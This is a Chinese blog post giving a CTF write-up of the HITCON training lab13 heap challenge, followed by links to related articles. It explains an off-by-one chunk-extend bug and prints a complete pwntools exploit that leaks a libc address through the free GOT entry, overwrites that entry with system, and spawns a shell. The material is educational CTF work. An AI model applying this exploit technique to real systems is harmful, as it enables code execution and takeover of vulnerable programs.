堆利用之chunk extend: HITCON tranining lab13

最新推荐文章于 2024-11-01 11:12:48 发布
最新推荐文章于 2024-11-01 11:12:48 发布
阅读量2.5k 收藏
点赞数
分类专栏: PWN 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/122539760
版权

64位ida分析程序,常见的目录结构;

通过静态分析 发现 edit 的时候 存在 off-by-one 漏洞:

红框标出的地方,可以多输入一个字节。

先看exp: 

from pwn import*
p = process("./heapcreator")
e = ELF("./heapcreator")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level = "debug"

def create(size,content):
	p.recvuntil("Your choice :")
	p.sendline("1")
	p.recvuntil("Size of Heap :")
	p.sendline(str(size))
	p.recvuntil("Content of heap:")
	p.sendline(content)
def edit(index,content):
	p.recvuntil("Your choice :")
	p.sendline("2")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Content of heap :")
	p.sendline(content)
	p.recvline()
def show(index):
	p.recvuntil("Your choice :")
	p.sendline("3")
	p.recvuntil("Index :")
	p.sendline(str(index))
def delete(index):
	p.recvuntil(":")
	p.sendline("4")
	p.recvuntil(":")
	p.sendline(str(index))
def exit():
	p.recvuntil(":")
	p.sendline("5")

create(24,'amazh')#0x18 + 0x10
create(16,'amazh')#0x10 + 0x10
edit(0,'/bin/sh\x00' +'a'*0x10+ '\x41')
delete(1)
create(0x30, p64(0) * 3 + p64(0x21) + p64(0x30) + p64(e.got['free'])) 
show(1)
p.recvuntil("Content : ")
data = p.recvuntil("Done !")
free_addr = u64(data.split("\n")[0].ljust(8, "\x00"))
#log.success(hex(free_data)
libc_base  = free_addr - libc.symbols['free']
log.success('libc base addr: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
edit(1, p64(system_addr))
#pause()
delete(0)

p.interactive()

解题思路:

首先创建了两个heap,大小分别是 0x18和 0x10,我们可以通过编辑heap0的content,从而溢出一个字节,来控制heap1 header的size位,从而实现extend。

extend之后 ,进行free(heap1) , 我们可以得到一个 0x41大小的chunk,然后我们再次malloc这个chunk 写入got地址 便可以泄露出free函数的真实地址  ,随后便可以实现任意写了。

cut_maize
关注
专栏目录
【Debug系列】munmap_chunk(): invalid pointer
CSDN明星博主,认证博客专家,视频、Matlab领域优质创作者。
08-28 1万+
DATE: 2020.8.28 文章目录1、项目场景2、问题描述3、原因分析4、解决方案 1、项目场景 在编写一个简单的内存开辟和释放程序时,遇到这个内存问题。 2、问题描述 munmap_chunk(): invalid pointer 3、原因分析 出现这个问题的主要原因在于内存读取或写入越界导致释放已经释放了的内存。 4、解决方案 参考: https://stackoverflow.com/questions/32118545/munmap-chunk-invalid-pointer ------
溢出 Chunk Extend
qq_69100706的博客
08-19 557
glibc管理器将内存分割成不同的chunk,每个chunk包含用户数据区和元数据区。元数据区包含关于chunk的信息,如大小和是否已分配。当一个程序请求更多内存时,管理器会尝试找到合适大小的chunk来满足需求。
Chunk Extend/Overlapping | 拓展、重叠
SkYe's Blog
08-06 1890
拓展&溢出 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk 块大小的操作如
好好说话之Chunk Extend/Overlapping
hollk’s blog
09-04 5125
这是进入领域的第二个知识点,Chunk Extend/Overlapping。不知道正在看这篇文章的你有没有一些拓展的思想,在了解的基础知识后有没有自己想过在中可能存在问题的点。我们可能从做第一道pwn题开始就知道要溢出、要泄露、要拿flag、拿shell,在知道了这些技巧之后看到shell这道题就过去了,可能也没想过为什么会这样,往往这些我们不在乎的东西才是同比场景的方法和思路 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Chunk Extend and Overlapping(HITCON Trainging lab13)
九层台
08-13 630
数据结构 unsigned __int64 create_heap() { _QWORD *v0; // rbx signed int i; // [rsp+4h] [rbp-2Ch] size_t size; // [rsp+8h] [rbp-28h] char buf; // [rsp+10h] [rbp-20h] unsigned __int64 v5; // [r...
Rookie学——heap extend
Ryouri suru
04-12 693
菜鸡分享heap extend的学习
HITCON Trainging lab13——CTFwiki
qq_53928256的博客
08-22 1208
通过off by one溢出修改next chunk的size域来实现overlap,修改指针实现执行system函数,获得系统权限
windowsland:HITCON CTF 2018
03-19
这个想法是利用Windows用户模式中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的字符串输入都不以NULL字节结尾,例如human->name , teacher...
Heap块Chunk
分不清东西南北的Laffey
11-29 4314
&块0x01 基础知识——Chunk0x02 基础知识——Heap0x03 的基本操作0x04 相关的函数1>malloc2>free0x05 溢出0x06 溢出中比较重要的几个步骤·寻找分配函数realloc malloc calloc·寻找危险函数·确定填充长度0x07 Fast bin0x08 Unsort bin注意点Fastbin attack--blin...
【逆向学习记录】分配中chunk&bins
卦星的专栏
03-23 3372
1 概述 学习的过程中,开始的时候,有个很难理解的东西,那个东西就是malloc,涉及到malloc就会涉及到chunk,实话说chunk这个东西的学习,确实经历了不少时间,总结一下,防止忘记 参考 Linux内存管理深入分析-上这篇文章详细将来chunk的进化过程,这里就不在深入查看了,深入浅出,是学习溢出基础的佳作 Linux内存管理深入分析-下这篇文章详细讲了bin的结构,并且被我大...
CentOS运行C++程序出现内存错误-munmap_chunk():invalid pointer
梦里水乡的专栏
04-10 5767
最近在CentOS用C++读数据,数据量挺大,而且是用的各种指针就出现了各种内存错误。调试的时候也是调试了很久,现将错误记录一下 出现munmap_chunk():invalid pointer的可能原因 一般来说,出现此类错误是在free的时候 (1)free的地址不是动态分配的地址 (2)动态分配的地址被修改过(对修改后的地址访问出问题) 我遇到的问题 描述:再分配
IDA Pro权威指南——读书笔记(第四章:IDA入门)
weixin_42559271的博客
06-27 2106
IDA Pro权威指南——读书笔记(第四章:IDA入门)本章简介1.启动IDA 本系列目录:https://blog.csdn.net/weixin_42559271/article/details/106946434 本章简介 第四章主要讲解了如何IDA的最最基础的用法,如IDA如何新建、保存、重新打开一个文件,第一次加载文件时选项所代表的含义,IDA的基本窗口界面。 以下是本章目录: 启动IDA IDA数据库文件 IDA桌面简介 初始分析时的桌面行为 IDA桌面提示和技巧 报告bug(本节略过) 1
HITCON Trainging lab13 heapcreator
snowleopard_bin的博客
10-03 1080
记录第一次不看任何writeup自己写出来的pwn题 前置知识: off by one chunk overlapping chunk extend 一开始先看程序打开哪些保护机制 可以改got表,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题上没有存放函数指针的,我也不会泄露。。) 然后分析程序,挖漏洞 首先从建函数看数据结构 结构...
Linux特种文件系统--tmpfs文件系统
刘元林的博客
10-29 1099
tmpfs类似于RamDisk(只能使用物理内存),使用虚拟内存(简称VM)子系统的页面存储文件。tmpfs完全依赖VM,遵循子系统的整体调度策略。说白了tmpfs跟普通进程差不多,使用的都是某种形式的虚拟内存,至于数据存储在物理内存中还是在交换分区中,全权交由VM子系统。定义: 是一个基于内存的文件系统,它在 RAM 中存储数据,因此访问速度非常快。用途: 通常用于存储临时文件,这些文件不需要永久保存,而且频繁读写。使用 可以减少对物理磁盘的磨损,并提高性能。示例路径:常见的 挂载点包括 、、 等。持
第三章.Linux文件管理和IO重定向
Raymond的博客
10-30 81
Linux的文件系统分层结构:FHS Filesystem Hierarchy Standard参考文档:http://www.pathname.com/fhs/ 1.3 应用程序的组成部分 1.4 CentOS 7 以后版本目录结构变化 /bin 和 /usr/bin /sbin 和 /usr/sbin /lib 和/usr/lib /lib64 和 /usr/lib64 范例: 1.5 Linux下的文件类型 - 普通文件 d 目录文件directory b 块设备block c 字符设备cha
Linux】MySQLMGR主从复制
Stringzhua的博客
10-30 880
MySQL是⽬前最流⾏的开源关系型数据库,国内⾦融⾏业也开始全⾯使⽤,其中MySQL5.7.17提出的 MGR(MySQL Group Replication)既可以很好的保证数据⼀致性⼜可以⾃动切换,具备故障检测功能、 ⽀持多节点写⼊,MGR是⼀项被普遍看好的技术。MGR(MySQL Group Replication)是MVSQL⾃带的⼀个插件,可以灵活部署。
Linux tac命令‌
weixin_37788102的博客
10-30 334
tac命令实际上是cat命令的一个变体,尽管它的功能相对简单,但在某些情况下非常有用。例如,当需要查看文件的最后一行(通常是标题或总结)时,使用tac命令可以避免滚动查看整个文件。此外,tac命令对于处理大型文件或需要快速定位文件末尾内容的情况非常有用‌。‌Linux tac命令‌是一个用于逆序显示文件内容的工具,其名称来源于“cat”的反向拼写。tac命令的基本功能是将文件的内容从最后一行开始输出,直到第一行结束,这与cat命令的功能相反,cat命令是从第一行开始输出直到最后一行。tac命令的基本用法。
Linux 之 信号概念、进程、进程间通信、线程、线程同步
最新发布
挥剑决浮云的博客
11-01 651
如果释放互斥锁时有一个以上的线程阻塞,那么这些阻塞的线程会被唤醒,它们都会尝试对互斥锁进行加锁,当有一个线程成功对互斥锁上锁之后,其它线程就不能再次上锁了,只能再次陷入阻塞,等待下一次解锁。事实上,子进程是父进程的一个副本,譬如子进程拷贝了父进程的数据段、、栈以及继承了父进程打开的文件描述符,父进程与子进程并不共享这些存储空间,这是子进程对父进程相应部分存储空间的完全复制,执行fork()之后,每个进程均可修改各自的栈数据以及段中的变量,而并不影响另一个进程。是一族函数,而不是一个单独的函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值